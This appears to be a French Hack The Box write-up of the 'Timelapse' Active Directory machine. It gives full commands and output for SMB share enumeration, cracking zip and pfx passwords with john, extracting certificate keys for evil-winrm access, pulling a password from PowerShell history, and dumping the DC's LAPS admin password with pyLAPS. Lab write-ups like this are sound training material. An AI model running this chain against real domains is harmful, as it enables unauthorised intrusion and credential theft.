Timelaps

smb pfx LAPS

Nom machine : Timelapse
Difficulté : Facile
OS : Windows - AD

Enumération

NMAP

map scan report for 10.10.11.152
Host is up (0.034s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-11-12 03:05:32Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233:a199:4504:0859:013f:b9c5:e4f6:91c3
|_SHA-1: 5861:acf7:76b8:703f:d01e:e25d:fc7c:9952:a447:7652
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-11-12T03:07:02+00:00; +7h59m59s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49693/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.11.152 -u '%'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.152:445	Name: timelaps.htb        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Shares                                            	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.11.152/Shares  
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

		6367231 blocks of size 4096. 1281188 blocks available
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

		6367231 blocks of size 4096. 1281085 blocks available
smb: \dev\> mget *
Get file winrm_backup.zip? yes
getting file \dev\winrm_backup.zip of size 2611 as winrm_backup.zip (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)

Accès initial

──(kali㉿kali)-[~/htb]
└─$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:                         ┌──(kali㉿kali)-[~/htb]
└─$ zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/htb]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2024-11-11 14:35) 5.555g/s 19285Kp/s 19285Kc/s 19285KC/s susu00xoxlove..superrbd
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
┌──(kali㉿kali)-[~/htb]
└─$ unzip winrm_backup.zip                                
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

On refait la même chose avec le fichier pfx...

┌──(kali㉿kali)-[~/htb]
└─$ pfx2john legacyy_dev_auth.pfx > hash2.txt
┌──(kali㉿kali)-[~/htb]
└─$ john hash2.txt --wordlist=/usr/share/wordlists/rockyou.txt         
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:21 DONE (2024-11-11 14:39) 0.04657g/s 150535p/s 150535c/s 150535C/s thuglife06..throughthemaze
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nous allons essayer d'extraire des informations.

https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-filewww.ibm.com

┌──(kali㉿kali)-[~/htb]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out file-priv.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(kali㉿kali)-[~/htb]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out file-priv.cert
┌──(kali㉿kali)-[~/htb]
└─$ openssl rsa -in file-priv.key -out drlive-decrypted.key
Enter pass phrase for file-priv.key:
writing RSA key

┌──(kali㉿kali)-[~/htb]
└─$ evil-winrm -S -i 10.10.11.152 -c file-priv.cert -k drlive-decrypted.key

Certificate-based Authentication over WinRMMedium

Elévation des privilèges

Nous avons trouvé dans l'historique un mot de passe pour l'user svc_deploy

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

┌──(kali㉿kali)-[~/htb]
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'

L'user appartient à "LAPS_Readers"

┌──(kali㉿kali)-[~/htb/pyLAPS]
└─$ python pyLAPS.py --action get -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV' --dc-ip 10.10.11.152
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | DC01$                : .{-Nl3kV7{WCt;$,5zIEQAn0
[+] All done!

Nous pouvons nous connecter en tant qu'administrator.

Nous pouvions aussi utiliser :

LAPS/AdmPwd.PS at master · ztrhgf/LAPSGitHub

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload ..//htb/LAPS/AdmPwd.PS/*
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-Module ./AdmPwd.PS.psd1

PrécédentSauna

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagSMB

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

SMB

Accès initial

Elévation des privilèges